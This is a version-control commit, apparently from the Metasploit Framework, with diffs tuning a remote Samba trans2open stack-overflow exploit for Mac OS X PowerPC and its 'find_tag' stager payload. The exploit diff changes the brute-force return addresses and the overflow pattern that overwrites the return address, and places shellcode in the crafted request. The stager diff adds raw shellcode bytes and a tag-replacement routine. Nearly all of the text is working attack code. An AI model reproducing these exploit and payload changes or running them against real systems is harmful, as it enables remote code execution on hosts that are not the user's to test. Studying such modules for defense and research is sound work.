PPC fixes

git-svn-id: file:///home/svn/incoming/trunk@3500 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/osx/samba/trans2open.rb

@@ -36,7 +36,7 @@ class Exploits::Osx::Samba::Trans2Open < Msf::Exploit::Remote
 			'Arch'           => ARCH_PPC,
 			'Targets'        => 
 				[
-					['Stack Brute Force', { 'Rets' => [0xbffffdfc, 0xbfa00000, 512] } ],
+					['Stack Brute Force', { 'Rets' => [0xbffff3fc, 0xbfa00000, 512] } ],
 
 				],
 			'DisclosureDate' => 'Apr 7 2003',
@@ -62,7 +62,7 @@ class Exploits::Osx::Samba::Trans2Open < Msf::Exploit::Remote
 				pattern = Rex::Text.rand_text_english(1988)
 	
 				# This stream covers the framepointer and the return address
-				pattern[1195, 64] = [curr_ret].pack('N') * 64
+				pattern[1195, 64] = [curr_ret].pack('N') * 8
 
 				# Stuff the shellcode into the request
 				pattern[3, payload.encoded.length] = payload.encoded
@@ -79,7 +79,7 @@ class Exploits::Osx::Samba::Trans2Open < Msf::Exploit::Remote
 				sock.put(trans)
 				handler
 				disconnect
-	
+				
 			rescue EOFError
 			rescue => e
 				break

modules/payloads/stagers/osx/ppc/find_tag.rb

@@ -33,6 +33,7 @@ module FindTag
 				{
 					'Offsets' =>
 						{
+							'TAG' => [ 54, 'RAW' ],
 						},
 					'Payload' =>
 						"\x3b\xa0\x0f\xff\x3b\xc0\x0f\xff\x37\x9d\xf0\x02\x7f\xdc\xf0\x51" +
@@ -43,6 +44,19 @@ module FindTag
 				}
 			))
 	end
+	
+	#
+	# Replace the TAG handler to just use two bytes
+	#
+	def replace_var(raw, name, offset, pack)
+		if (name == 'TAG')
+			$stderr.puts "Replacing #{offset.to_s} " + raw[offset,2].unpack("H*")[0]
+			raw[offset, 2] = datastore[name][0,2]
+			return true
+		end
+
+		return false
+	end	
 
 end